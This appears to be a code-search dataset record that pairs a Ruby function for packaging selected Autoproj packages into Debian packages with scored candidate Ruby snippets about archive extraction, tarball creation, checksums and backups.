"def extract src_path, dst_path = File.dirname(src_path)\n src_path = File.expand_path(src_path)\n src_name = File.basename(src_path)\n src_suffix = File.extname(src_name)\n src_prefix = File.basename(src_name, src_suffix)\n\n Dir.mktmpdir(nil, dst_path) do |tmp_dir|\n # decompress the archive\n cd tmp_dir do\n case src_name.sub(/\\.part$/, '')\n when /\\.(tar\\.gz|tar\\.Z|tgz|taz)$/i\n system 'tar', '-zxf', src_path\n\n when /\\.(tar\\.bz|tar\\.bz2|tbz|tbz2)$/i\n system 'tar', '-jxf', src_path\n\n when /\\.(tar\\.xz|txz)$/i\n system 'tar', '-Jxf', src_path\n\n when /\\.(tar|cpio|gem)$/i\n system 'tar', '-xf', src_path\n\n when /\\.(tar.lzo|tzo)$/i\n system \"lzop -xc #{src_path.inspect} | tar -xf -\"\n\n when /\\.(lzo)$/i\n system 'lzop', '-x', src_path\n\n when /\\.(gz)$/i\n system \"gunzip -c #{src_path.inspect} > #{src_prefix.inspect}\"\n\n when /\\.(bz|bz2)$/i\n system \"bunzip2 -c #{src_path.inspect} > #{src_prefix.inspect}\"\n\n when /\\.(shar)$/i\n system 'sh', src_path\n\n when /\\.(7z)$/i\n system '7zr', 'x', src_path\n\n when /\\.(zip)$/i\n system 'unzip', src_path\n\n when /\\.(jar)$/i\n system 'jar', 'xf', src_path\n\n when /\\.(rz)$/i\n ln src_path, src_name # rzip removes the archive after extraction\n system 'rzip', '-d', src_name\n\n when /\\.(rar)$/i\n system 'unrar', 'x', src_path\n\n when /\\.(ace)$/i\n system 'unace', 'x', src_path\n\n when /\\.(arj)$/i\n system 'arj', 'x', src_path\n\n when /\\.(arc)$/i\n system 'arc', 'x', src_path\n\n when /\\.(lhz|lha)$/i\n system 'lha', 'x', src_path\n\n when /\\.(a|ar)$/i\n system 'ar', '-x', src_path\n\n when /\\.(Z)$/\n system \"uncompress -c #{src_path.inspect} > #{src_prefix.inspect}\"\n\n when /\\.(z)$/\n system \"pcat #{src_path.inspect} > #{src_prefix.inspect}\"\n\n when /\\.(zoo)$/i\n system 'zoo', 'x//', src_path\n\n when /\\.(cab)$/i\n system 'cabextract', src_path\n\n when /\\.(deb)$/i\n system 'ar', 'x', src_path\n\n when /\\.(rpm)$/i\n system \"rpm2cpio #{src_path.inspect} | cpio -i --make-directories\"\n\n else\n warn \"I do not know how to extract #{src_path.inspect}\"\n end\n end\n\n # clean any mess made by decompression\n manifest = Dir.new(tmp_dir).entries - %w[ . .. ]\n\n if manifest.length == 1 # there was no mess!\n adj_dst = File.join(dst_path, manifest.first)\n adj_src = File.join(tmp_dir, manifest.first)\n else\n adj_src = tmp_dir\n adj_dst = File.join(dst_path, src_name[/.*(?=\\..*?)/])\n end\n\n adj_dst << \"+#{Time.now.to_i}\" until\n not File.exist? adj_dst and\n mv(adj_src, adj_dst, :force => true)\n\n touch tmp_dir # give Dir.mktmpdir() something to remove\n\n adj_dst\n end\nend",
"def test_tar_from_backuprc\n assert_equal('gnutar', config('TAR'))\n end",
"def remote_backup_path #:nodoc:\n full_tarfile+\".gz\"\n end",
"def targz\n files = procedure.get_adapter_configuration.attributes['files']\n if files.is_a?(Array)\n puts system_messages[:archiving]; puts system_messages[:compressing]\n %x{ tar -czf #{File.join(tmp_path, compressed_file)} #{files.map{|f| f.gsub(' ', '\\ ')}.join(' ')} }\n elsif files.is_a?(String)\n puts system_messages[:archiving]; puts system_messages[:compressing]\n %x{ tar -czf #{File.join(tmp_path, compressed_file)} #{files.gsub(' ', '\\ ')} }\n end\n end",
"def checksums; end",
"def archive\n @repo.archive(sha, nil, :format => 'tgz', :prefix => \"#{safe_name}/\")\n end",
"def tarfile #:nodoc:\n rp = Pathname.new(remote_directory) \n rp.basename.to_s+\".tar\"\n end",
"def extract_metadata!\n shell_out \"tar zOxf #{package_path} data.tar.gz | tar zOxf - ./opt/chef-server/version-manifest.json > #{temp_metadata_path}\"\n end",
"def ungzip(tarfile)\n z = Zlib::GzipReader.new(tarfile)\n unzipped = StringIO.new(z.read)\n z.close\n unzipped\n end",
"def untar_file(f, to)\n end",
"def dmg_package_checksum\n case new_resource.source\n when :direct\n package_metadata[:sha256]\n else\n new_resource.checksum\n end\n end",
"def write_tgz\n # Grab the contents of the gzipped tarball for reading\n contents = gzipped_tarball\n\n # Write the .tar.gz into the staging directory\n File.open(\"#{staging_dir}/#{package_name}\", \"wb\") do |tgz|\n while chunk = contents.read(1024)\n tgz.write(chunk)\n end\n end\n\n # Copy the .tar.gz into the package directory\n FileSyncer.glob(\"#{staging_dir}/*.tar.gz\").each do |tgz|\n copy_file(tgz, Config.package_dir)\n end\n end",
"def create_tar_gz_file(gz_base_file_name, source_file)\n gz_name = \"#{gz_base_file_name}.tar.gz\"\n cmd = \"tar -czf #{gz_name} #{source_file}\"\n system(cmd)\n gz_name\n end",
"def ungzip(tarfile)\n z = Zlib::GzipReader.new(tarfile)\n unzipped = StringIO.new(z.read)\n z.close\n unzipped\n end",
"def compress_files_and_copy\n timestamp = Time.now.strftime(\"%Y%m%d-%H%M%S\") + '_'\n tar_file = @backup_folder + timestamp + \"syc-backup.tar.gz\" \n tar_command = \"tar cfz #{tar_file} #{@files.join(\" \")}\"\n\n stdout, stderr, status = Open3.capture3(tar_command)\n\n unless status.exitstatus == 0\n STDERR.puts \"There was a problem executing command\"\n STDERR.puts tar_command\n STDERR.puts stderr\n exit status.exitstatus\n end\n\n tar_file\n end",
"def get_backup\n tar_file = get_tempfile\n safe_run \"tar -cf #{tar_file} #{tar_dir}\"\n tar_file\n end",
"def targz(targzfile, *src)\n raise \"tar.gz file #{targzfile} shouldn't be a directory\" if File.directory? targzfile\n Zlib::GzipWriter.open targzfile do |otarfile|\n tar0(otarfile, *src)\n end\n end",
"def external_dependency_checksum; end",
"def tar___( directory, filename )\r\n raise StandardError, \"Under investigation\"\r\n got = @ndev.rpc.file_archive( :destination => filename, :source => directory )\r\n end",
"def generate_checksums(package)\n File.open(package, \"r\") do |pkg|\n {\n \"MD5sum\" => checksum(pkg.rewind && pkg, :md5),\n \"SHA1\" => checksum(pkg.rewind && pkg, :sha1),\n \"SHA256\" => checksum(pkg.rewind && pkg, :sha256),\n }\n end\n end",
"def ensure_compressed\n return if is_compressed?\n\n original_timestamp = blob_created_at\n content_upload(file_download)\n blob.update_column(:created_at, original_timestamp)\n end",
"def sync_archive_resource(resource, version)\n fetch_resource(resource, version) do |archive|\n dest_dir = %W(#{@datadir} #{resource} #{version}).join('/')\n log.debug \"exploding fetched archive #{archive} into data dir: #{dest_dir}\"\n # process the tar.gz\n Gem::Package::TarReader.new(Zlib::GzipReader.open(archive)) do |targz|\n dest = nil\n targz.each do |entry|\n dest = File.join dest_dir, entry.full_name\n # check if any old data exists, could happen if same resource name reused with different format\n if File.directory? dest\n log.debug \"removing existing directory (#{dest} before extracting archive there\"\n FileUtils.rm_rf dest\n elsif File.file? dest.chomp('/')\n log.debug \"removing existing file (#{dest.chomp}) before extracting archive there\"\n File.delete dest.chomp('/')\n end\n # extract\n if entry.directory?\n FileUtils.mkdir_p dest, mode: entry.header.mode\n elsif entry.file?\n # ensure extraction directory exists\n d_dir = File.dirname(dest)\n FileUtils.mkdir_p d_dir unless File.exist? d_dir\n\n File.open dest, 'wb' do |f|\n f.print entry.read\n end\n FileUtils.chmod entry.header.mode, dest\n elsif entry.header.typeflag == '2' # symlink\n File.symlink entry.header.linkname, dest\n end\n dest = nil\n end\n end\n end\n end",
"def checksum\n fil_header[:checksum]\n end",
"def decompress_package(package)\n @logger.info \"Decompressing #{package.path}\\nto #{@target_location}\"\n FileUtils.mkdir_p(@target_location)\n Dir.chdir(@target_location) do\n # Clear out existing package\n FileUtils.rm_rf Dir.glob(\"#{@target_location}/*\")\n RakeUtils.system \"tar -zxf #{package.path}\"\n end\n @logger.info \"Decompressed\"\n end",
"def test_saves_gzip_files_as_gzipped_but_returns_non_gzipped_path\n location_uncompressed =\n post_file :path => '/foo',\n :file => 'simple_text_file',\n :type => 'application/octet-stream'\n\n location_compressed =\n post_file :path => '/foo',\n :file => 'simple_text_file.gz',\n :type => 'application/x-gzip',\n :expected_extension => 'gz' # note not expected_extension_suffix - we uploaded as a gzip file not a content-encoded plain file\n\n assert_equal location_uncompressed + \".gz\", location_compressed # hash must be based on the content, not the encoded content\n end",
"def checksum_of(url, etag, last_modified)\n #noinspection RubyArgCount\n Zlib::crc32(url + etag + last_modified).to_s\n end",
"def asset_checksum(asset)\n filename = asset.original_file_location\n match = filename.match(/\\ASHA256E-s\\d*--(\\h{64})\\.[a-zA-Z]+\\Z/)\n match ? match[1] : nil\n end",
"def generate_dummy_checksum()\n file = Pedant::Utility.new_random_file\n checksum = Pedant::Utility.checksum(file)\n sandbox = create_sandbox([file])\n upload_to_sandbox(file, sandbox)\n sleep 2 #give s3 some time\n commit_sandbox(sandbox)\n checksum\n end",
"def gzfix(file, dest)\n gzip_header = \"\\x1f\\x8b\".force_encoding(Encoding::ASCII_8BIT)\n limit = 1024\n\n # Read a few lines, looking for gzip header\n file.rewind\n 10.times do |i|\n line = file.readline(limit).force_encoding(Encoding::ASCII_8BIT)\n if line[0,2] == gzip_header # Found gzip!\n if i == 0\n File.rename(file, dest) # Whole file is ok\n else # Use the file from this line on\n IO.copy_stream(file, dest, -1, file.pos - line.size)\n end\n return\n end\n break unless line.ascii_only? # Doesn't look like header lines\n end\n raise \"sqldump didn't seem to give us gzip data\"\n end",
"def is_tgz? archive, type=nil\n type == :tgz || !archive.match(/\\.tgz$/).nil? || !archive.match(/\\.tar.gz$/).nil?\n end",
"def tar_metrics_files\n v = (@verbose ? \"v\" : \"\")\n comm = \"tar cz#{v}f #{@output_dir}/#{@tar_file_name} -C #{@parent_staging_dir} .\"\n puts \"Tarring metrics with: #{comm}\" if @verbose\n system(comm)\n puts \"Created #{@output_dir}/#{@tar_file_name}\"\n end",
"def untar!(tarball)\n system(\"tar -C #{@tmp} -xzf #{tarball}\")\n end",
"def checksum(path)\n FileChecksum.new(path, Digest::SHA1).checksum\n end",
"def uncompress_local_tarball(onhost_tar_file, onhost_base_dir, download_file)\n variant, version, arch, codename = self['platform'].to_array\n case variant\n when /^(fedora|el|centos|redhat|opensuse|sles|debian|ubuntu|cumulus)$/\n execute(\"tar -zxvf #{onhost_tar_file} -C #{onhost_base_dir}\")\n when /^solaris$/\n # uncompress PE puppet-agent tarball\n if version == '10'\n execute(\"gunzip #{onhost_tar_file}\")\n tar_file_name = File.basename(download_file, '.gz')\n execute(\"tar -xvf #{tar_file_name}\")\n elsif version == '11'\n execute(\"tar -zxvf #{onhost_tar_file}\")\n else\n msg = \"Solaris #{version} is not supported by the method \"\n msg << 'uncompress_local_tarball'\n raise ArgumentError, msg\n end\n else\n msg = \"Platform #{variant} is not supported by the method \"\n msg << 'uncompress_local_tarball'\n raise ArgumentError, msg\n end\n end",
"def repackage(path)\n @logger.debug(\"Repackaging box '#{@name}' to: #{path}\")\n\n Util::SafeChdir.safe_chdir(@directory) do\n # Find all the files in our current directory and tar it up!\n files = Dir.glob(File.join(\".\", \"**\", \"*\")).select { |f| File.file?(f) }\n\n # Package!\n Util::Subprocess.execute(\"bsdtar\", \"-czf\", path.to_s, *files)\n end\n\n @logger.info(\"Repackaged box '#{@name}' successfully: #{path}\")\n\n true\n end",
"def checksum\n\t\t@checksum ||= FileManager.checksum(@path)\n #\t\tif file?\n #\t\t\treturn FileManager.checksum(@path)\n #\t\tend\n end",
"def cdtar(cdpath, tarfile, *src)\n raise \"tar file #{tarfile} shouldn't be a directory\" if File.directory? tarfile\n File.open tarfile, 'w' do |otarfile|\n cdtar0 cdpath, otarfile, *src\n end\n end",
"def tar(dir, ext=nil)\n path = File.expand_path(dir)\n skip = path.size + 1\n tar_io = StringIO.new\n Gem::Package::TarWriter.new(tar_io) do |tar|\n Dir[File.join(path, \"**/*#{'.' + ext if ext}\")].each do |file|\n stat = File.stat(file)\n name = file[skip..-1]\n if stat.file?\n tar.add_file_simple(name, stat.mode, stat.size) do |tf|\n tf.write(File.binread(file))\n end\n elsif stat.directory?\n tar.mkdir(name, stat.mode)\n end\n end\n end\n tar_io.string\n end",
"def checksum\n Digest::SHA256.file(sample_dmg).hexdigest\nend",
"def test_compressed_instance\r\n assert_respond_to(@fh, :compressed=)\r\n assert_nothing_raised{ @fh.compressed = true }\r\n assert(File.compressed?(@file))\r\n assert_nothing_raised{ @fh.compressed = false }\r\n assert_equal(false, File.compressed?(@file))\r\n end",
"def unpack_tgz archive, destination, clobber=nil\n validate archive, destination\n\n tar = Zlib::GzipReader.new(File.open(archive, 'rb'))\n if(!should_unpack_tgz?(destination, clobber))\n raise Sprout::Errors::DestinationExistsError.new \"Unable to unpack #{archive} into #{destination} without explicit :clobber argument\"\n end\n\n Archive::Tar::Minitar.unpack(tar, destination)\n\n # Recurse and unpack gzipped children (Adobe did this double \n # gzip with the Linux FlashPlayer for some weird reason)\n [\"#{destination}/**/*.tgz\", \"#{destination}/**/*.tar.gz\"].each do |pattern|\n Dir.glob(pattern).each do |child|\n if(child != archive && dir != File.dirname(child))\n unpack_tgz(child, File.dirname(child))\n end\n end\n end\n end",
"def cleanup_extract_source(attrs={})\n\n execute \"cleanup_source\" do\n cwd Chef::Config[:file_cache_path]\n command \"rm -rf #{attrs['src_dir']}\"\n not_if do ! FileTest.directory?(attrs['src_dir']) end\n action :run\n end\n\n extract_flags = \"tar zxf\" if attrs['src_file'] =~ /tar\\.gz/\n extract_flags = \"tar jxf\" if attrs['src_file'] =~ /tar\\.bz2/\n extract_flags = \"7za x\" if attrs['src_file'] =~ /7z/\n\n execute \"extract_source\" do\n cwd Chef::Config[:file_cache_path]\n command \"#{extract_flags} #{Chef::Config[:file_cache_path]}/#{attrs['src_file']}\"\n action :run\n end\n\nend",
"def compression?; end",
"def compress(path, compress_tar_file)\n Mongolicious.logger.info(\"Compressing database #{path}\")\n\n system(\"cd #{path} && tar -cpf#{compress_tar_file ? 'j' : ''} #{path}.tar.bz2 .\")\n raise \"Error while compressing #{path}\" if $?.to_i != 0\n\n # Remove mongo dump now that we have the bzip\n FileUtils.rm_rf(path)\n\n return \"#{path}.tar.bz2\"\n end",
"def checksum_trailer\n fil_trailer[:checksum]\n end",
"def tarball\n return @tarball if defined? @tarball\n\n require 'open3'\n Dir.mktmpdir do |tmpdir|\n definition.each do |options|\n glob = options.fetch(:glob)\n prefix = options[:prefix]\n ignore_hidden = options[:ignore_hidden]\n\n files = Dir[glob]\n files.reject! { |f| f.start_with?('.') } if ignore_hidden\n\n dest = prefix ? File.join(tmpdir, prefix) : tmpdir\n\n FileUtils.mkpath(dest)\n FileUtils.cp_r(files, dest)\n end\n\n excludes.each do |path|\n full_path = File.join(tmpdir, path)\n if File.file?(full_path)\n File.unlink(File.join(tmpdir, path))\n end\n end\n\n # Specify the correct ruby version in the Dockerfile.\n bundle_dockerfile = File.join(tmpdir, \"Dockerfile\")\n content = IO.read(bundle_dockerfile)\n content = content.gsub(\"{{ruby_version}}\", ruby_version)\n IO.write bundle_dockerfile, content\n\n if dockerfile\n File.unlink bundle_dockerfile\n FileUtils.cp dockerfile, bundle_dockerfile\n end\n\n # Find hash of all files we're sending over.\n digest = Digest::SHA1.new\n Dir[File.join(tmpdir, '**/*')].each do |path|\n if File.file? path\n open path, 'r' do |file|\n digest.update file.read\n end\n end\n end\n @image_name = \"hoosegow:#{digest.hexdigest}\"\n\n # Create tarball of the tmpdir.\n stdout, stderr, status = Open3.capture3 'tar', '-c', '-C', tmpdir, '.'\n\n raise Hoosegow::ImageBuildError, stderr unless stderr.empty?\n\n @tarball = stdout\n end\n end",
"def checksum\n render json: content_files_checksums(druid).to_json\n end",
"def generate_compiled_archive(project)\n name_and_version = \"#{project.name}-#{project.version}\"\n name_and_version_and_platform = \"#{name_and_version}.#{name}\"\n name_and_platform = \"#{project.name}.#{name}\"\n final_archive = \"output/#{name_and_version_and_platform}.tar.gz\"\n archive_directory = \"#{project.name}-archive\"\n\n # previously, we weren't properly handling the case of custom BOM paths.\n # If we have a custom BOM path, during Makefile execution, the top-level\n # BOM is moved to the custom path. So, when cleaning up BOMs for non-custom\n # paths we just want to remove the BOM at the top level of the tarball.\n # But, if we have a custom BOM path we want to move it back to where it\n # was prior to the Makefile execution so we can preserve it as an artifact\n # but not leave it to conflict if it's installed in the same custom path\n # as a project using this archive.\n bill_of_materials_command = 'rm -f bill-of-materials'\n if project.bill_of_materials\n bill_of_materials_command = \"mv .#{project.bill_of_materials.path}/bill-of-materials ../..\"\n end\n\n [\n \"mkdir output\",\n \"mkdir #{archive_directory}\",\n \"gunzip -c #{name_and_version}.tar.gz | '#{tar}' -C #{archive_directory} -xf -\",\n \"rm #{name_and_version}.tar.gz\",\n \"cd #{archive_directory}/#{name_and_version}; #{bill_of_materials_command}; #{tar} cf ../../#{name_and_version_and_platform}.tar *\",\n \"gzip -9c #{name_and_version_and_platform}.tar > #{name_and_version_and_platform}.tar.gz\",\n \"cp build_metadata.#{name_and_platform}.json output/#{name_and_version_and_platform}.json\",\n \"cp bill-of-materials output/#{name_and_version_and_platform}-bill-of-materials ||:\",\n \"cp #{name_and_version_and_platform}.tar.gz output\",\n \"#{shasum} #{final_archive} > #{final_archive}.sha1\"\n ]\n end",
"def file_checksum(file_path)\n Digest::SHA256.file(file_path).hexdigest\n end",
"def external_dependency_checksum\n nil\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def tar_cmd\n # Rely on gnu tar for solaris and OSX.\n case %x{uname -s}.chomp\n when \"SunOS\"\n return \"gtar\"\n when \"Darwin\"\n return \"gnutar\"\n else\n return \"tar\"\n end\n end",
"def targzls(targzfile)\n raise \"invalid tar.gz file #{targzfile}\" unless File.file? targzfile\n Zlib::GzipReader.open targzfile do |otarfile|\n tarls0 otarfile\n end\n end",
"def tarball(destination, paths)\n # check for filepath length limit\n full_destination = File.expand_path(destination)\n if full_destination.length > 259 # 256 chars max; \"C:\\\" doesn't count\n puts \"[TarBall] ERROR cannot generate #{destination} because path exceeds 256 char limit. shorten component name by at least by #{full_destination.length - 259} chars\"\n return\n end\n\n Zlib::GzipWriter.open(destination) do |gzip|\n out = Archive::Tar::Minitar::Output.new(gzip)\n\n paths.each do |fi|\n if File.exist?(fi)\n Archive::Tar::Minitar.pack_file(fi, out)\n else\n puts \"[TarBall] ERROR Could not file file: #{fi}\"\n end\n end\n out.close\n end\n end",
"def checksum_of(origin)\n #noinspection RubyArgCount\n Zlib::crc32(origin).to_s\n end",
"def checksum\n Nanoc::Checksummer.calc(self)\n end",
"def make_tarball_from_files files, options={}\n tarball = options[:filename]\n args = ['czf', tarball, '--exclude-vcs']\n exclude_each options[:exclude] do |exclude|\n args.push '--exclude', exclude\n end\n args.concat files\n run 'tar', *args\n release tarball, :cd => 1\nend",
"def test_dry_run\n @options[:dry_run] = true\n\n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_change_file_patch\n\n # Creates new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n # Still the same\n assert_equal original_file, file_contents('foo.rb')\n end",
"def extract\n # Only used by tar\n compression_switch = \"\"\n compression_switch = \"z\" if downloaded_file.end_with?(\"gz\")\n compression_switch = \"--lzma -\" if downloaded_file.end_with?(\"lzma\")\n compression_switch = \"j\" if downloaded_file.end_with?(\"bz2\")\n compression_switch = \"J\" if downloaded_file.end_with?(\"xz\")\n\n if Ohai[\"platform\"] == \"windows\"\n if downloaded_file.end_with?(*TAR_EXTENSIONS) && source[:extract] != :seven_zip\n returns = [0]\n returns << 1 if source[:extract] == :lax_tar\n\n shellout!(\"tar #{compression_switch}xf #{downloaded_file} --force-local -C#{project_dir}\", returns: returns)\n elsif downloaded_file.end_with?(*COMPRESSED_TAR_EXTENSIONS)\n Dir.mktmpdir do |temp_dir|\n log.debug(log_key) { \"Temporarily extracting `#{safe_downloaded_file}' to `#{temp_dir}'\" }\n\n shellout!(\"7z.exe x #{safe_downloaded_file} -o#{windows_safe_path(temp_dir)} -r -y\")\n\n fname = File.basename(downloaded_file, File.extname(downloaded_file))\n fname << \".tar\" if downloaded_file.end_with?(\"tgz\", \"txz\")\n next_file = windows_safe_path(File.join(temp_dir, fname))\n\n log.debug(log_key) { \"Temporarily extracting `#{next_file}' to `#{safe_project_dir}'\" }\n shellout!(\"7z.exe x #{next_file} -o#{safe_project_dir} -r -y\")\n end\n else\n shellout!(\"7z.exe x #{safe_downloaded_file} -o#{safe_project_dir} -r -y\")\n end\n elsif downloaded_file.end_with?(\".7z\")\n shellout!(\"7z x #{safe_downloaded_file} -o#{safe_project_dir} -r -y\")\n elsif downloaded_file.end_with?(\".zip\")\n shellout!(\"unzip #{safe_downloaded_file} -d #{safe_project_dir}\")\n else\n shellout!(\"#{tar} #{compression_switch}xf #{safe_downloaded_file} -C#{safe_project_dir}\")\n end\n end",
"def zipfile metadata\n cmd = \"cd #{Myreplicator.configs[@export_obj.source_schema][\"export_stg_dir\"]}; gzip #{@export_obj.filename}\"\n\n puts cmd\n\n zip_result = metadata.ssh.exec!(cmd)\n\n unless zip_result.nil?\n raise Exceptions::ExportError.new(\"Export Error\\n#{zip_result}\") if zip_result.length > 0\n end\n\n metadata.zipped = true\n\n return zip_result\n end",
"def create_chksum_manifest\n chksum_manifest = {}\n files = Dir['*'].select{ |f| File.file? f }\n files.each do |file|\n chksum_manifest[file] = Digest::MD5.file(file).hexdigest\n end\n chksum_manifest\n end",
"def include_checksum?\n include_checksum\n end"
] | [
"0.6814556",
"0.6727206",
"0.6657132",
"0.6571898",
"0.6375211",
"0.63011515",
"0.6265729",
"0.62573904",
"0.6230874",
"0.6166431",
"0.6116192",
"0.6047838",
"0.6046607",
"0.60226125",
"0.602238",
"0.6006378",
"0.5954265",
"0.5954103",
"0.59446114",
"0.5941396",
"0.59183174",
"0.5825434",
"0.5797798",
"0.5796019",
"0.5786474",
"0.5779461",
"0.57768595",
"0.5773908",
"0.5768815",
"0.57599604",
"0.57554233",
"0.5742977",
"0.5712859",
"0.56956553",
"0.56885993",
"0.56725353",
"0.5657912",
"0.56426203",
"0.56373864",
"0.5612758",
"0.5604601",
"0.56031334",
"0.55932605",
"0.5592206",
"0.55727124",
"0.5551238",
"0.5549023",
"0.5525483",
"0.5518496",
"0.5491839",
"0.5487762",
"0.54725516",
"0.5451013",
"0.5449515",
"0.54261553",
"0.5423495",
"0.5416893",
"0.54087156",
"0.5367669",
"0.5361781",
"0.5358016",
"0.53542674",
"0.53196347",
"0.5319214",
"0.5308894",
"0.53066385",
"0.5291066",
"0.5288955",
"0.5286007",
"0.52725136",
"0.5271014",
"0.5268706",
"0.52665263",
"0.5257531",
"0.52569765",
"0.5253356",
"0.5248075",
"0.52392334",
"0.5216542",
"0.5205056",
"0.520133",
"0.5200508",
"0.51972616",
"0.5192329",
"0.51888984",
"0.51789266",
"0.51624465",
"0.51515865",
"0.5151452",
"0.51405627",
"0.5139436",
"0.5138222",
"0.511257",
"0.5103513",
"0.51024336",
"0.510207",
"0.50989854",
"0.509175",
"0.50852567",
"0.5079301"
] | 0.72869587 | 0 |
Package selection is a collection of pkginfo objects | def package_selection(selection,
force_update: nil,
patch_dir: nil,
package_set_dir: nil,
use_remote_repository: false)
sync_packages = {}
selected_gems = []
selection.each_with_index do |pkginfo, i|
pkg_name = pkginfo.name
pkg = pkginfo.pkg
Autoproj.message "Packaging #{pkg_name} (#{i + 1}/#{selection.size})", :green
# Making sure all packages that require base/cmake due to using Rock CMake macros have
# a dependency on base/cmake
if File.file?(File.join(pkg.srcdir, "CMakeLists.txt"))
cmakelists_txt = File.read(File.join(pkg.srcdir, "CMakeLists.txt"))
if cmakelists_txt =~ /include\(Rock\)|Rock\.cmake/ || cmakelists_txt =~ /find_package\(Rock\)/
pkg.depends_on "base/cmake" unless pkg.name == "base/cmake"
end
end
begin
options = {:force_update => force_update, :patch_dir => patch_dir, :package_set_dir => package_set_dir}
if !use_remote_repository
options[:existing_source_dir] = pkg.srcdir
end
# just to update the required gem property
selected_gems.concat pkginfo.dependencies[:extra_gems]
# Perform the actual packaging
package(pkginfo, options)
sync_packages[pkg_name] = { :debian_name => debian_name(pkginfo),
:build_deps => build_dependencies(pkginfo),
:type => :package
}
rescue Interrupt
raise
rescue Exception => e
Apaka::Packaging.warn "failed to package #{pkg.name}: #{e.message} #{e.backtrace}"
next
end
end
[sync_packages, selected_gems.uniq]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def main_package_set\n each_package_set.find(&:main?)\n end",
"def relevant_packages\n packages.select { |p| p['version'] == version }\n end",
"def expand_package_selection(selection, filter: true)\n result = PackageSelection.new\n\n all_selected_packages = self.all_selected_packages.to_set\n all_source_package_names = all_package_names\n all_osdeps_package_names = os_package_resolver.all_package_names\n selection.each do |sel|\n match_pkg_name = Regexp.new(Regexp.quote(sel))\n all_matches = Array.new\n each_metapackage do |meta_pkg|\n if meta_pkg.name =~ match_pkg_name\n all_matches << [meta_pkg.name, meta_pkg.name == sel]\n end\n end\n all_source_package_names.each do |pkg_name|\n pkg = find_autobuild_package(pkg_name)\n if pkg.name =~ match_pkg_name\n all_matches << [pkg.name, pkg.name == sel]\n elsif \"#{sel}/\".start_with?(\"#{pkg.srcdir}/\")\n all_matches << [pkg.name, true]\n elsif pkg.respond_to?(:builddir) && \"#{sel}/\".start_with?(\"#{pkg.builddir}/\")\n all_matches << [pkg.name, true]\n elsif pkg.srcdir.start_with?(sel) && all_selected_packages.include?(pkg.name)\n all_matches << [pkg.name, false]\n end\n end\n all_osdeps_package_names.each do |pkg_name|\n if pkg_name =~ match_pkg_name\n all_matches << [pkg_name, pkg_name == sel]\n end\n end\n\n exact_matches, partial_matches =\n all_matches.partition { |_, exact_match| exact_match }\n selected_partial_matches, not_selected_partial_matches =\n partial_matches.partition { |pkg_name, _| all_selected_packages.include?(pkg_name) }\n not_selected_partial_matches.clear if result.has_match_for?(sel)\n\n matches =\n [exact_matches, selected_partial_matches, not_selected_partial_matches]\n .find { |m| !m.empty? }\n\n matches&.each do |pkg_name, _|\n update_selection(result, sel, pkg_name, true)\n end\n end\n\n result.filter_excluded_and_ignored_packages(self) if filter\n\n nonresolved = selection - result.matches.keys\n [result, nonresolved]\n end",
"def find_package_set(name)\n each_package_set.find { |set| set.name == name }\n end",
"def find_package_set(selection)\n package_sets.find do |pkg_set|\n name = pkg_set.name\n name == selection ||\n selection.start_with?(\"#{pkg_set.raw_local_dir}/\") ||\n selection.start_with?(\"#{pkg_set.user_local_dir}/\")\n end\n end",
"def package_selected?(name)\n Autoproj.workspace.manifest.package_selected?(name, false)\nend",
"def packages; end",
"def packages\n FileList[package_path('.*')]\n end",
"def all_package_names\n each_autobuild_package.map(&:name)\n end",
"def resolve_package(selection)\n matching_packages = find_packages(selection)\n if matching_packages.empty?\n matching_packages = find_packages_with_directory_shortnames(selection)\n end\n\n if matching_packages.size > 1\n # If there is more than one candidate, check if there are some that are not\n # present on disk\n present = matching_packages.find_all { |pkg| File.directory?(pkg.srcdir) }\n matching_packages = present if present.size == 1\n end\n\n if matching_packages.empty?\n raise CLIInvalidArguments, \"cannot find '#{selection}' in the current autoproj installation\"\n elsif matching_packages.size > 1\n raise CLIAmbiguousArguments, \"multiple packages match '#{selection}' in the current autoproj installation: #{matching_packages.map(&:name).sort.join(', ')}\"\n else\n matching_packages.first\n end\n end",
"def find_package_set_by_name(name)\n @package_sets[name]\n end",
"def ask_for_package_set(message)\n ask_for(message,package_sets)\n end",
"def packages\n ::Packages::Package.all\n end",
"def packages()\n\t\t\t\tpackages = installed_packages()\n\n\t\t\t\tpackagelist = `#{@finkbin} list -n`\n\n\t\t\t\tpackagelist.each_line() { |line|\n\t\t\t\t\tlinearr = line.split()\n\t\t\t\t\tpackages[linearr[0]] = PackageInfo.new()\n\t\t\t\t\tpackages[linearr[0]].name = linearr[0]\n\t\t\t\t\tpackages[linearr[0]].version = linearr[1]\n\t\t\t\t\tpackages[linearr[0]].description = linearr[2]\n\t\t\t\t}\n\n\t\t\t\treturn(packages)\n\t\t\tend",
"def default_packages(validate = true)\n if has_layout?\n layout_packages(validate)\n else\n result = PackageSelection.new\n all_package_names.each do |pkg_name|\n package_type, package_name = resolve_single_package_name(pkg_name).first\n next if excluded?(package_name) || ignored?(package_name)\n\n result.select(package_name, package_name, osdep: (package_type == :osdeps))\n end\n result\n end\n end",
"def versions_for_select(unit_member)\n static_options = [['Most Recent','']]\n dynamic_options = package_branch.packages.map {|p| [p.version, p.id]}\n static_options + dynamic_options\n end",
